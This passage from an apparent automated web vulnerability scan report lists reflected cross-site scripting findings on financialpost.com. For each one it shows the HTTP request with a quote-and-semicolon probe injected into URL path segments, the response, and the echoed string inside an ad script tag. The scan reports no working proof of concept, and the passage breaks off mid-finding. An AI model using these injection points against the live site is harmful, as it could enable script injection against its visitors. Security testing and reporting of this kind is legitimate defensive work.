Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ajax/email/6e698'%3b8b8919e8594 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43228


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/ajax/email/6e698';8b8919e8594/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=ajax;kw=email;kw=6e698';8b8919e8594;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=94697531?">
...[SNIP]...

1.37. http://www.financialpost.com/blogs/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /blogs/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8274'%3b195d5cfee53 was submitted in the REST URL parameter 1. This input was echoed as b8274';195d5cfee53 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogsb8274'%3b195d5cfee53/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:15:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36261


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/blogsb8274';195d5cfee53/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=blogsb8274';195d5cfee53;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=89788726?">
...[SNIP]...

1.38. http://www.financialpost.com/careers/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /careers/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5338f'%3bc1451072755 was submitted in the REST URL parameter 1. This input was echoed as 5338f';c1451072755 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /careers5338f'%3bc1451072755/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:15:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36303


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers5338f';c1451072755/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers5338f';c1451072755;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=17841948?">
...[SNIP]...

1.39. http://www.financialpost.com/careers/Passionate+about+inclusion/3908742/story.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /careers/Passionate+about+inclusion/3908742/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60ebf'%3bee703a43543 was submitted in the REST URL parameter 1. This input was echoed as 60ebf';ee703a43543 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /careers60ebf'%3bee703a43543/Passionate+about+inclusion/3908742/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 81033
Expires: Sun, 19 Dec 2010 03:15:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers60ebf';ee703a43543/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers60ebf';ee703a43543;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=31781956?">
...[SNIP]...

1.40. http://www.financialpost.com/careers/Passionate+about+inclusion/3908742/story.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /careers/Passionate+about+inclusion/3908742/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17bc9'%3b34da138a151 was submitted in the REST URL parameter 3. This input was echoed as 17bc9';34da138a151 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /careers/Passionate+about+inclusion/390874217bc9'%3b34da138a151/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70051
Expires: Sun, 19 Dec 2010 03:15:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers/passionate-about-inclusion/390874217bc9';34da138a151/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers;kw=passionate-about-inclusion;kw=390874217bc9';34da138a151;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=39990
...[SNIP]...

1.41. http://www.financialpost.com/careers/Passionate+about+inclusion/3908742/story.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /careers/Passionate+about+inclusion/3908742/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29ff7'%3bb3f1c59f563 was submitted in the REST URL parameter 4. This input was echoed as 29ff7';b3f1c59f563 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /careers/Passionate+about+inclusion/3908742/29ff7'%3bb3f1c59f563 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:15:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37230


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers/passionate%20about%20inclusion/3908742/29ff7';b3f1c59f563/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers;kw=passionate%20about%20inclusion;kw=3908742;kw=29ff7';b3f1c59f563;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'o
...[SNIP]...

1.42. http://www.financialpost.com/careers/Pink+collar+jobs+spare+women+from+recession/3951473/story.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /careers/Pink+collar+jobs+spare+women+from+recession/3951473/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d5c25'%3b9ab1b8da1c9 was submitted in the REST URL parameter 1. This input was echoed as d5c25';9ab1b8da1c9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /careersd5c25'%3b9ab1b8da1c9/Pink+collar+jobs+spare+women+from+recession/3951473/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74447
Expires: Sun, 19 Dec 2010 03:15:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careersd5c25';9ab1b8da1c9/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careersd5c25';9ab1b8da1c9;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=70150980?">
...[SNIP]...

1.43. http://www.financialpost.com/careers/Pink+collar+jobs+spare+women+from+recession/3951473/story.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /careers/Pink+collar+jobs+spare+women+from+recession/3951473/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb7af'%3b3e6963f564a was submitted in the REST URL parameter 3. This input was echoed as bb7af';3e6963f564a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /careers/Pink+collar+jobs+spare+women+from+recession/3951473bb7af'%3b3e6963f564a/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 63862
Expires: Sun, 19 Dec 2010 03:15:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers/pink-collar-jobs-spare-women-from-recession/3951473bb7af';3e6963f564a/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers;kw=pink-collar-jobs-spare-women-from-recession;kw=3951473bb7af';3e6963f564a;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surro
...[SNIP]...

1.44. http://www.financialpost.com/careers/Pink+collar+jobs+spare+women+from+recession/3951473/story.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /careers/Pink+collar+jobs+spare+women+from+recession/3951473/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d42d4'%3b113cc4c7a9f was submitted in the REST URL parameter 4. This input was echoed as d42d4';113cc4c7a9f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /careers/Pink+collar+jobs+spare+women+from+recession/3951473/d42d4'%3b113cc4c7a9f HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:15:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37780


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers/pink%20collar%20jobs%20spare%20women%20from%20recession/3951473/d42d4';113cc4c7a9f/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers;kw=pink%20collar%20jobs%20spare%20women%20from%20recession;kw=3951473;kw=d42d4';113cc4c7a9f;kw=npo;kw=fpo;tile='+dartad_tile+';'+a
...[SNIP]...

1.45. http://www.financialpost.com/careers/Rules+keep+work+parties+festive/3978714/story.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /careers/Rules+keep+work+parties+festive/3978714/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67407'%3b92dac48a721 was submitted in the REST URL parameter 1. This input was echoed as 67407';92dac48a721 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /careers67407'%3b92dac48a721/Rules+keep+work+parties+festive/3978714/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74402
Expires: Sun, 19 Dec 2010 03:15:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers67407';92dac48a721/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers67407';92dac48a721;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=95963968?">
...[SNIP]...

1.46. http://www.financialpost.com/careers/Rules+keep+work+parties+festive/3978714/story.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /careers/Rules+keep+work+parties+festive/3978714/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f598'%3b1d4c31151fb was submitted in the REST URL parameter 3. This input was echoed as 5f598';1d4c31151fb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /careers/Rules+keep+work+parties+festive/39787145f598'%3b1d4c31151fb/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 63421
Expires: Sun, 19 Dec 2010 03:15:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers/rules-keep-work-parties-festive/39787145f598';1d4c31151fb/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers;kw=rules-keep-work-parties-festive;kw=39787145f598';1d4c31151fb;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=
...[SNIP]...

1.47. http://www.financialpost.com/careers/Rules+keep+work+parties+festive/3978714/story.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /careers/Rules+keep+work+parties+festive/3978714/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71a25'%3b364cbeb8eca was submitted in the REST URL parameter 4. This input was echoed as 71a25';364cbeb8eca in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /careers/Rules+keep+work+parties+festive/3978714/71a25'%3b364cbeb8eca HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:15:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44245


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers/rules%20keep%20work%20parties%20festive/3978714/71a25';364cbeb8eca/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers;kw=rules%20keep%20work%20parties%20festive;kw=3978714;kw=71a25';364cbeb8eca;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surro
...[SNIP]...

1.48. http://www.financialpost.com/careers/Texting+lazy+IMHO/3941140/story.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /careers/Texting+lazy+IMHO/3941140/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19264'%3b66fe6c3fb0d was submitted in the REST URL parameter 1. This input was echoed as 19264';66fe6c3fb0d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /careers19264'%3b66fe6c3fb0d/Texting+lazy+IMHO/3941140/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78645
Expires: Sun, 19 Dec 2010 03:15:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers19264';66fe6c3fb0d/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers19264';66fe6c3fb0d;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=69933413?">
...[SNIP]...

1.49. http://www.financialpost.com/careers/Texting+lazy+IMHO/3941140/story.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
